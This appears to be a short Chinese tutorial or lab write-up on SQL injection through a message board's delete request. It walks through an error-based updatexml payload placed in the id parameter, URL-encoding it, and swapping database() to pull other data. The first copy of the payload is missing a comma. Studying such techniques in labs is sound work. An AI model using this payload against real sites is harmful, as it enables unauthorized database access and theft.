LOADING

delete注入

网络安全

delete 注入

一个留言板,允许用户留言,并可以删除留言。 进行删除操作后,查看网络历史记录,可以看到请求为 get 请求,并带有参数id
发送到Repeater模块进行下一步操作
浏览器 F12 也能查看 id 的值会直接拼入后台的 SQL 语句,导致 SQL 注入。

  1. 传入的是数值,所以没有引号闭合
  2. 因为不是查询操作,所以不用selectunion
  3. 用函数报错来进行信息获取
# payload
1 or updatexml(1,concat(0x7e database()),0)

将 payload 放在注入点 id 中,注意是 get 请求需要进行 url 编码

  • 浏览器输入框里不能自动编码
    • burpsuite 可以编码,选中1 or updatexml(1,concat(0x7e database()),0),快捷键Ctrl+U
    • 或者右键选择转换选中内容->URL->URL-encode key characters
    • 手动编码(好像只是把空格变成+号 🤔)
    # payload:
    ?id=1+or+updatexml(1,concat(0x7e,database()),0)
    # 返回结果:
    XPATH syntax error: '~root'
  • hackbar 可以自动编码 接下来只需要替换database()位置的命令就能得到我们想要的数据了 🤗